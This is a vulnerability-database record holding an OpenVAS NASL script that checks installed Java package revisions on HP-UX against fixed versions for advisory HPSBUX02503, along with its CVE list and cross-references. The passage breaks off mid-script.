{"id": "OPENVAS:1361412562310835225", "type": "openvas", "bulletinFamily": "scanner", "title": "HP-UX Update for Java HPSBUX02503", "description": "Check for the Version of Java", "published": "2010-02-15T00:00:00", "modified": "2018-01-23T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835225", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "references": ["02503", "http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760"], "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "lastseen": "2018-01-23T13:05:36", "viewCount": 1, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2018-01-23T13:05:36", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10369", "SECURITYVULNS:VULN:11915", "SECURITYVULNS:DOC:27037"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066469", "OPENVAS:800975", "OPENVAS:66471", "OPENVAS:1361412562310800972", "OPENVAS:800972", "OPENVAS:136141256231066303", "OPENVAS:136141256231066471", "OPENVAS:66469", "OPENVAS:835225", "OPENVAS:1361412562310800975"]}, {"type": "redhat", "idList": ["RHSA-2009:1647", "RHSA-2009:1551", "RHSA-2009:1571", "RHSA-2009:1584", "RHSA-2009:1694", "RHSA-2010:0408", "RHSA-2009:1643", "RHSA-2009:1560"]}, {"type": "suse", "idList": ["SUSE-SA:2010:004", "SUSE-SA:2010:002", "SUSE-SA:2010:003", "SUSE-SA:2009:058"]}, {"type": "nessus", "idList": ["SUSE_JAVA-1_5_0-IBM-6741.NASL", "SUSE_11_JAVA-1_6_0-SUN-091113.NASL", "SUSE_11_0_JAVA-1_5_0-SUN-091109.NASL", "SUSE_11_1_JAVA-1_5_0-SUN-091109.NASL", "SUSE9_12564.NASL", "REDHAT-RHSA-2009-1647.NASL", "SUSE_11_0_JAVA-1_6_0-SUN-091113.NASL", "SUSE_11_2_JAVA-1_6_0-SUN-091113.NASL", "REDHAT-RHSA-2009-1643.NASL", "SUSE_JAVA-1_5_0-IBM-6740.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84499"]}, {"type": "cve", "idList": ["CVE-2009-3877", "CVE-2009-3874", "CVE-2009-3867", "CVE-2009-3876", "CVE-2009-3869", "CVE-2009-3875", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3868", "CVE-2009-3873"]}, {"type": "kaspersky", "idList": ["KLA10344"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1584"]}, {"type": "centos", "idList": ["CESA-2009:1584"]}, {"type": "fedora", "idList": ["FEDORA:9A32710F7FF", "FEDORA:BD01E10F83E", "FEDORA:1C6D410F83E"]}, {"type": "ubuntu", "idList": ["USN-859-1"]}], "modified": "2018-01-23T13:05:36", "rev": 2}, "vulnersScore": 8.7}, "pluginID": "1361412562310835225", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02503\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Increase in privilege\n Denial of Service and other vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities could allow remote unauthorized access, privilege \n escalation, and Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835225\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02503\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_name(\"HP-UX Update for Java HPSBUX02503\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n 